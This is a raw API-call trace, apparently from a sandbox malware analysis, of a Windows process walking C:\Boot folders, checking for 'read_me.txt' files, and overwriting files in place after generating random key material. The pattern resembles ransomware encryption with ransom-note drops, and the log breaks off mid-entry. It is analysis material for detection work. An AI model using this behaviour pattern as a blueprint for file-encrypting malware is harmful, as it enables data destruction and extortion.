[0074.881] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Windows") returned 14 [0074.881] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Windows", cAlternateFileName="")) returned 0 [0074.881] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.881] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\read_me.txt") returned 18 [0074.881] GetProcessHeap () returned 0x4f10000 [0074.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0074.881] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 1 [0074.881] GetProcessHeap () returned 0x4f10000 [0074.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0074.905] GetProcessHeap () returned 0x4f10000 [0074.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0074.905] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0074.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x243393c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x243393c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.906] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0074.906] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x243393c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x243393c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="..", cAlternateFileName="")) returned 1 [0074.906] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0074.906] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.906] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0074.906] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.916] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243393c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x243393c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x243393c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.916] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\read_me.txt") returned 29 [0074.916] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\read_me.txt" (normalized: "c:\\boot\\da-dk\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0074.916] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.916] CloseHandle (hObject=0x7a4) returned 1 [0074.916] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243393c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x243393c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x243393c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.916] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.916] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\read_me.txt") returned 29 [0074.916] GetProcessHeap () returned 0x4f10000 [0074.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0074.916] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 3 [0074.916] GetProcessHeap () returned 0x4f10000 [0074.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.111] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.111] ReadFile (in: hFile=0x7a4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0075.111] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.111] GetProcessHeap () returned 0x4f10000 [0075.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0075.111] GetProcessHeap () returned 0x4f10000 [0075.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0075.111] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0075.111] GetProcessHeap () returned 0x4f10000 [0075.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x7d748a8 [0075.111] ReadFile (in: hFile=0x7a4, lpBuffer=0x7d748a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x7d748a8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.191] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.191] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d748a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d748a8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.191] GetProcessHeap () returned 0x4f10000 [0075.191] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0075.191] GetProcessHeap () returned 0x4f10000 [0075.191] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0075.191] GetProcessHeap () returned 0x4f10000 [0075.191] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0075.191] GetProcessHeap () returned 0x4f10000 [0075.191] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0075.191] GetProcessHeap () returned 0x4f10000 [0075.191] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.192] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.192] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0075.193] GetProcessHeap () returned 0x4f10000 [0075.193] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778c0 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778c0 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778c0 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.194] GetProcessHeap () returned 0x4f10000 [0075.194] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778c0 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778c0 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778c0 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7d778c0 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.195] GetProcessHeap () returned 0x4f10000 [0075.195] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0075.196] GetProcessHeap () returned 0x4f10000 [0075.196] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0075.196] GetProcessHeap () returned 0x4f10000 [0075.196] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778c0 | out: hHeap=0x4f10000) returned 1 [0075.196] GetProcessHeap () returned 0x4f10000 [0075.196] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0075.196] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.196] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0075.198] WriteFile (in: hFile=0x7a4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0075.198] GetProcessHeap () returned 0x4f10000 [0075.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d748a8 | out: hHeap=0x4f10000) returned 1 [0075.198] GetProcessHeap () returned 0x4f10000 [0075.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0075.198] GetProcessHeap () returned 0x4f10000 [0075.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0075.198] CloseHandle (hObject=0x7a4) returned 1 [0075.307] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 3 [0075.307] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.307] ReadFile (in: hFile=0x79c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0075.307] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.307] GetProcessHeap () returned 0x4f10000 [0075.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0075.307] GetProcessHeap () returned 0x4f10000 [0075.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0075.307] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0075.307] GetProcessHeap () returned 0x4f10000 [0075.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x7d84500 [0075.307] ReadFile (in: hFile=0x79c, lpBuffer=0x7d84500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x7d84500*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.424] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.424] WriteFile (in: hFile=0x79c, lpBuffer=0x7d84500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d84500*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.424] GetProcessHeap () returned 0x4f10000 [0075.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0075.424] GetProcessHeap () returned 0x4f10000 [0075.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: 